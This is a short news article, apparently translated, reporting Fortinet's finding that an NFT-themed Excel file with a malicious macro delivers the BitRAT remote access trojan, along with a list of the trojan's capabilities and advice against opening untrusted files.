Careful! This Malware Threatens NFT Fans To Hijack Their PCs

NFT is a digital token that uses blockchain to verify the authenticity of content. (photo credit: Andrey Metelev / Unsplash)

JAKARTA - As usual, if something is trending, cybercriminals will also target it, including the popularity of non-fungible tokens or NFTs.

NFT is a digital token that uses blockchain to verify content authenticity and digital ownership. When there are trends and money involved, people quickly become interested.

Cybercriminals in this case try to trick victims into downloading trojan malware that is capable of hijacking their PCs while stealing usernames and passwords.

In a report by cybersecurity researchers at Fortinet, they have seen what is described as a strange Excel spreadsheet containing information about NFT at first, but the file's real purpose is to aid in the delivery of the malware dubbed, BitRAT.

BitRAT is a remote access trojan (RAT) that first appeared for sale on underground forums in August 2020. What's unique about BitRAT is that it can bypass User Account Control (UAC), a Windows feature that helps prevent unauthorized changes to the operating system.

The malware comes with a variety of trojan functions, including the ability to steal login credentials from browsers and applications, the ability to log keystrokes and the ability to upload and download files.

This version of BitRAT can also monitor the victim's screen in real time, use their webcam and listen to audio through the microphone. That means, this malware can freely stalk victims.

Launching ZDNet, Friday, February 18th, unfortunately it doesn't go into detail how the malicious Excel file could get to the victim, but it does offer information about the estimated potential return on investment and the amount of NFT available in each series.

The Excel file also contains a link to a legitimate Discord channel on NFT, meaning it's likely that the intended victim is an NFT fan. The Excel file contains a malicious macro, which, when enabled, runs a PowerShell script that picks up and downloads the malware, before running it silently on the compromised PC.

Apart from collecting data and stalking victims, BitRAT can also install cryptojacking malware on infected PCs, allowing them to secretly use processing power to mine the Monero cryptocurrency.

Since NFTs can change hands for large sums of money, it's more likely that cybercriminals are after financially. But even if the victim does not have NFT, the amount of personal information that can be stolen with the trojan malware can be very valuable to the attacker, and damaging to the victim.

To prevent this, Fortinet researchers warn against opening files downloaded from untrusted or suspicious sources, this could prevent threat actors from gaining access to users' money and valuable data.